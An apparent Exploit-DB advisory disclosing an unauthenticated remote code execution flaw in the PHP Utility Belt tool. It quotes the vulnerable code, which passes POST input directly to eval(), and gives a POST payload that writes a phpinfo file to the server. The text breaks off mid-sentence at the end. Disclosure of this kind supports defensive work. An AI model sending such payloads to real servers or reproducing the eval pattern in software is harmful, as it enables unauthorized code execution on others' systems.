PHP Utility Belt - Remote Code Execution

ID EDB-ID:38901
Type exploitdb
Reporter WICS
Modified 2015-12-08T00:00:00


PHP Utility Belt - Remote Code Execution. Webapps exploit for php platform

                                            Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author         : WICS
Date             : 8/12/2015
Software Link  :


PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication 

Vulnerable code (Line number 12 to 15)

if ( isset( $_POST['code'] ) ) {
  if ( false === eval( $_POST['code'] ) )
    echo 'PHP Error encountered, execution halted';

Access URL
in Post data type 
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

above code will generate info.php file which will display php info
Shell link will be